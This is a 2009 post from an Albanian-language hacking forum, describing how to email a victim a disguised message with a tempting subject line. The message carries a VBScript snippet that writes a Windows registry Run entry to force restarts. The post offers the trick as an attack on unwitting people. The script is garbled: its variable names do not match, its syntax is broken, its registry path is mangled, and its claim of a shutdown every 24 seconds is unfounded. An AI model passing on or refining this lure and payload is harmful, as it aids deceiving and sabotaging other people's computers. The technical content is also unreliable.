HACK FOR CS
 
ForumCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Fikja PC dikujna per 24 sekonda

Shko poshtë 
AutoriMesazh
PredaTorNumri i postimeve : 15
Join date : 07/03/2009

MesazhTitulli: Fikja PC dikujna per 24 sekonda   Tue Mar 10, 2009 1:49 pm

Fikja dikujt PC
Fikja pc dikujt qdo 24 seconda permes emailit

Shkojm e hapim Inboxin ton dhe shkojm e kriojme nje email te ri dhe e shenojme emajlin e viktimes dhe ne Subject shenojme diqka interesante si ris NEW film dhe ne pjese ku e shenojme mesazhin vendosim kete

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

kur ta hap emajlin viktima pc do ti fiked gjdo 24 sekonda

Only BY : PredaTTor
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Fikja PC dikujna per 24 sekonda
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
MITROVICA HACK :: MSN-
Kërce tek: